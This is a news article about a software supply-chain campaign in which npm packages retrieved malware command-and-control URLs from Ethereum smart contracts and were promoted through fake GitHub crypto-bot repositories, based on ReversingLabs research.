Ethereum Exploited in Advanced Malware Campaign Targeting Open Source Devs

Cybersecurity experts have uncovered a new type of software supply chain attack using Ethereum smart contracts to deliver malware. 

According to researchers at ReversingLabs, two malicious packages were uploaded to the npm registry in July. These packages, named colortoolsv2 and mimelib2, used the Ethereum blockchain in an unexpected way: to hide and deliver malicious URLs.

The packages posed as simple, developer-friendly tools. However, once downloaded, they acted as delivery agents for more dangerous malware. Typically, in malware campaigns, the harmful command-and-control (C2) URLs are hardcoded into the malicious code. 

That method is easier to detect and block. In contrast, these packages retrieved the C2 URLs from Ethereum smart contracts, blending malicious communication into regular blockchain activity. This clever method significantly reduced the chance of early detection.

“This is something we haven’t seen previously. It highlights the fast evolution of detection evasion strategies by malicious actors who are trolling open-source repositories and developers”, the ReversingLabs researchers explained.

The two packages were minimal in code and size. Each contained only what was necessary to launch the second stage of the attack. Once installed, they reached out to a C2 server, downloaded a secondary payload, and began compromising the host system.

Colortoolsv2 was the first of the two discovered. Once its activity was flagged, it was promptly removed from npm. But the attackers were quick to respond. 

A nearly identical package named mimelib2 was uploaded soon after. It carried the same malicious payload and behaviour, indicating a persistent and well-coordinated effort.

Lucija Valentić, a researcher at ReversingLabs, confirmed, “The two npm packages abused smart contracts to conceal illegal commands that installed downloader malware on compromised systems”.

This method of using Ethereum smart contracts as a vehicle for malware distribution represents a shift in how attackers think about and use blockchain technologies, not for crypto gains directly, but as a reliable tool in cyber campaigns.

Fake GitHub Projects Added Legitimacy

The malware campaign went beyond npm packages. It also relied on an extensive network of fake GitHub repositories. These were set up to create a convincing image of active, legitimate crypto projects. 

The repositories were made to appear trustworthy to unsuspecting developers and crypto enthusiasts browsing GitHub.

Each fake repository was linked to the malicious npm packages. For example, one such project, solana-trading-bot-v2, appeared to be a functional trading bot for Solana. It included thousands of commits, active contributors, and a growing number of stars. 

However, these indicators were fabricated. The commits were generated automatically and the contributors were fake accounts, sockpuppets created around the same time as the npm packages.

“When we dug into the large number of commits and what was committed, it quickly became apparent that the code contributors were also fakes”, the ReversingLabs analysts said. 

“In fact, there are thousands of commits and each day that number increases by a couple of thousand, indicating that the malicious actor has set up an infrastructure for automated commit pushing”, they added. 

These deceptive tactics were also applied to other repositories. Names like ethereum-mev-bot-v2, arbitrage-bot, and hyperliquid-trading-bot were used.

Although these were less convincing in their setup, they followed the same template: fake activity, cloned contributors, and documentation designed to make the projects appear legitimate.

The objective was clear, trick developers into incorporating malicious code into their own projects. Once the infected npm packages were added, they acted as a backdoor, allowing the attackers to install further malware and potentially steal sensitive data, access development environments, or compromise cryptocurrency wallets.

A Pattern of Targeting Crypto Ecosystem

This recent malware campaign is not an isolated event. Instead, it is part of a rising trend of cyberattacks specifically targeting the open-source software supply chain and the cryptocurrency space. 

ReversingLabs has noted that in 2024 alone, 23 campaigns had been observed where attackers planted malicious code in open-source projects. These incidents often targeted developers working on or around cryptocurrency applications.

In past cases, attackers have experimented with several stealth techniques. In 2023, Python packages were found hiding malware inside GitHub Gists. 

Even earlier, in 2022, a fake Tailwind CSS npm package hid its C2 URLs behind popular platforms like Google Drive and OneDrive. These efforts show how cybercriminals are constantly testing new delivery methods to stay ahead of traditional security tools.

The latest Ethereum-based attack shows just how much this approach has evolved. By using blockchain smart contracts, tools that are public, decentralised, and often considered secure, the attackers found a way to mask malware instructions behind legitimate-looking blockchain transactions.

Valentić pointed out that this should serve as a wake-up call to the developer community, saying:

“These latest attacks by threat actors, including the creation of sophisticated attacks using Ethereum blockchain and GitHub, show that attacks on repositories are evolving and that developers and development organisations alike need to be on the lookout for efforts to implant malicious code in legitimate applications, gain access to sensitive development assets and steal sensitive data and digital assets.”

Notably, the use of Ethereum smart contracts as a hiding place for malicious instructions is not completely without precedent. The notorious Lazarus Group, affiliated with North Korea, had previously used Ethereum smart contracts in different forms of attacks.

But this is one of the first known cases where smart contracts were specifically used to store malware distribution URLs.

ReversingLabs also revealed that the entire infrastructure behind the attack was built with long-term use in mind. The npm packages and GitHub repositories were not isolated attempts. 

Instead, they were part of a broader campaign to maintain a persistent threat presence across open-source platforms, focusing particularly on cryptocurrency projects.

In conclusion, the findings highlight an urgent need for developers, especially those in the crypto world, to be cautious when relying on open-source packages. 

With threat actors using increasingly clever techniques, even tools that appear trustworthy can be Trojan horses.

As blockchain continues to grow in popularity, it is not just a target for attacks, it is also becoming a part of the attack strategy itself.